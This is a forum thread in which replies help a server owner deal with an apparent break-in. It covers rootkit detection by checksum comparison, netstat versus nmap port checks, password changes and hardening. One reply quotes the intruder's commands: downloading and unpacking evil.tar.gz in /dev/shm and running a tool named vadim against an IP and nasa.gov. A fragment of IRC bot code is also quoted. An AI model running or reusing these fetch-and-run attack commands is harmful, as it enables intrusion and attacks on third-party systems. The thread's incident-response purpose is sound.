Persistent Exploit

It sounds this hacker is not one those lazy or incompetent using using old rootkits with known bugs in them. You are probably dealing with an a hacker how knows what is he doing. If that's the case, it is nearly impossible to be certain that a system hasn't been compromised; if the system is online and running, and if the intruder was any good, it will be completely impossible to determine that a system has been hacked without first taking it offline.

This is in no small part due to the prevalence of "rootkits," replacement system binaries that hide the signs of a compromised system from its users. For example, a rootkit may replace 'ps' with a version of the command that will not display information about particular processes, and may replace 'md5sum' with a version of the command that reports the expected --- though not accurate --- checksums for compromised system binaries. Other frequently-compromised binaries include ls, netstat, top; a relatively complete rootkit may include two dozen or more binaries, most of which are trojaned versions of standard system commands.

The standard approach to proving that a rootkit has been installed on a particular system is to boot the system from a known secure operating system install, such as a rescue CD or single-floppy Linux distribution, and (using a known-safe copy of md5sum) compare the checksums of system binaries to checksums from the genuine article.

Recently, conventional rootkits have begun supplanting 'kernel module rootkits', which are much more difficult to detect. But on systems compromised with conventional rootkits, comparison is still the best approach -- one made easier with the help of several utilities.

Another good way to tell if a system has been compromised is to check to see if the ports that 'netstat' reports as listening exactly match the set of ports that 'nmap' -- a scanning tool -- reports when run from a remote system. A clever hacker will hide his backdoors with IP Chains or IP Tables, but oftentimes a backdoor will be globally accessible.

In general, if you can show discrepancies between the system's behavior and its expected behavior, you may have a hacked system. (Then again, you may just have found a bug.)

I suggest you secure and harden your server right after OS reload. Good luck

 

I would install the OS and the firewall and do any hardening before assigning the final IP to the system, you could either put the system behind a gateway/firewall or just give it another IP. Of course you will want to assign the final IP to the system before finishing your CPanel install.

Oh another thing you will want to do is change the passwords. Any hacker worth his salt will download your shadow password file as soon as he roots the server. He will then brute force the hashes until he has the original passwords. (A couple of days max)

 

Yeah, but leaving behind "/root/evil.tar.gz" isn't exactly covering his tracks.

:p

 

gunakan find / -type d -perm 777

cd /dev/shm;wget www.geocities.com/fileremoved for kiddies for forum protection
cd /dev/shm;tar -zvxf evil.tar.gz
cd /dev/shm/evil;./vadim 202.51.231.38 389 nasa.gov


It seems like some kind of IRC bot as well:
if {[lindex $ping 0] == "0"} { putserv "PRIVMSG $channel :IP


Make sure you have the latest kernel.
Make sure you limit acces to compilers and system binaries like wget.
Make sure you have a new version of mod_security rules to block these kind of attempts.